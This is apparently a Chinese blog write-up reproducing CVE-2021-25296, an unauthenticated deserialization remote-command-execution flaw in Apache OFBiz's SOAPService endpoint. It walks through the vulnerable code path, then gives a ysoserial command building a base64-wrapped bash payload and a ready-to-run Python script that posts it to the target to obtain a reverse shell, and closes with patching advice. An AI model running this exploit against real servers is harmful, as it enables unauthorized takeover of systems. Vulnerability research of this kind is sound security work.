Apache OFBiz rmi反序列化漏洞

Palpitate_LL2025-01-04 16:14

CVE-2021-25296 复现

#漏洞描述

名称:Apache OFBiz rmi反序列化漏洞

CVE编号:CVE-2021-25296

危害:未授权远程命令执行

影响版本:Apache OFBiz < 17.12.06

OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了一整套基于Java的开发Web应用程序的组件和工具,已经正式成为 Apache 的顶级项目。

RMI 是 java 远程方法调用,它能让某个 java虚拟机上的对象调用另一个 Java虚拟机的对象的方法。值得注意的是,rmi 传输过程必然会使用序列化和反序列化,如果使用不当,很容易造成反序列化漏洞。

#漏洞分析

参考文章:Apache Ofbiz反序列化(CVE-2021-26295)分析

通过分析,触发漏洞的路由为

/webtools/control/SOAPService,SOAPService的EventHandler为SOAPEventHandler,SOAPEventHandler调用了SoapSerializer.deserialize,SoapSerializer.deserialize 又调用了 XmlSerializer.deserialize,该方法获取soap请求Body子节点后又调用了deserializeSingle解析xml,deserializeSingle中发现可以构造特殊的soap请求进入deserializeCustom()

在 deserializeCustom 方法中,如果标签为cus-obj则获取元素内容,并将其传入 getObject 方法中,getObject又调用了 getObjectException 方法

getObjectException 方法代码如下:

复制代码 
public static Object getObjectException(byte[] bytes) throws ClassNotFoundException, IOException {
try(ByteArrayInputStream bis = new ByteArrayInputStream(bytes); 
	SafeObjectInputStream wois = new SafeObjectInputStream(bis)) {
	return wois.readObject();
} 
}

代码中调用了 SafeObjectInputStream 对象的 readObject 进行反序列化,我们知道 SafeObjectInputStream 是重写后的 ObjectInputStream,在 ObjectInputStream 的基础上加了黑白名单过滤,我们来分析一下漏洞修复前的 SafeObjectInputStream 代码与修复后的差距,如下图所示

className.contains 后是黑黑名单的内容,绿色表示新增,红色表示删除,可以看到,在修复前黑名单的内容只有

org.apache.commons.fileupload,还是可以通过修复后增加的 java.rmi.server 触发漏洞执行命令

#漏洞利用

使用 ysoserial 生成漏洞利用的 payload

复制代码 
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME  "bash -c {echo,想要执行的命令的base64编码}|{base64,-d}|{bash,-i}" | xxd|cut -f 2,3,4,5,6,7,8,9 -d " "|tr -d ' '|tr -d '\n'

因为命令执行成功也不会有回显,所以下面使用了 反弹 shell 的命令

将得到的 hex 数据赋给下面 payload 的变量 hex_data

复制代码 
import requests

url = 'http://host:port' + '/webtools/control/SOAPService'

hex_data = "aced000573.......000678"

headers = {
    'Content-Type': 'text/xml'
}

data = f'''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
     <test>
        <cus-obj>{hex_data}</cus-obj>
     </test>
</soapenv:Body></soapenv:Envelope>'''

response = requests.post(url, data=data, headers=headers, verify=False, timeout=5)

if 'check your parameters' in response.text:
    print("maybe succeed")
else:
    print("maybe failed")

在 vps 上开启监听,运行脚本,成功获取shell

#修复建议

  1. 升级 ofbiz 到版本大于 17.12.06
  2. 仿造官方修复办法,添加黑名单 java.rmi.server
  3. 限制不信任用户对 RMI 服务的访问
相关推荐
路baby1 天前
Pikachu安装过程中常见问题(apache和MySQL无法正常启动)
计算机网络·mysql·网络安全·adb·靶场·apache·pikachu
努力打怪升级1 天前
Apache HTTP Server 2.4 Windows 版完整配置与运维手册
运维·http·apache
航Hang*2 天前
第2章:进阶Linux系统——第10节:Linux 系统编程与 Shell 脚本全解笔记(GCC+Make+Vim+Shell Script)
linux·运维·服务器·学习·vim·apache·vmware
倔强的石头1062 天前
时序数据库选型指南:可视化与分析协同怎么选?——以 Apache IoTDB + Grafana + 大数据引擎为例
apache·时序数据库·iotdb
zz0723202 天前
Apache Kafka 开源的分布式事件流平台
分布式·kafka·apache
A-刘晨阳2 天前
流批一体架构下的时序数据库选型:Apache IoTDB实时计算能力深度解析与国际化对比
架构·apache·时序数据库
wei_shuo2 天前
工业物联网数据基础设施:Apache IoTDB 与 TimechoDB 的云原生与 AI 进化之路
物联网·apache·iotdb
橘子编程5 天前
Apache Hadoop知识全解析
大数据·hive·hadoop·apache
zzj_2626105 天前
实验三 循环结构程序设计(Python)
服务器·python·apache
lulu12165440786 天前
谷歌Gemma 4实战指南:Apache 2.0开源,移动端AI新时代来临
java·开发语言·人工智能·开源·apache·ai编程
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程04AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)07Oh My Codex 快速使用指南08UV安装并设置国内源09Claude Code 未登录 使用第三方模型10实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了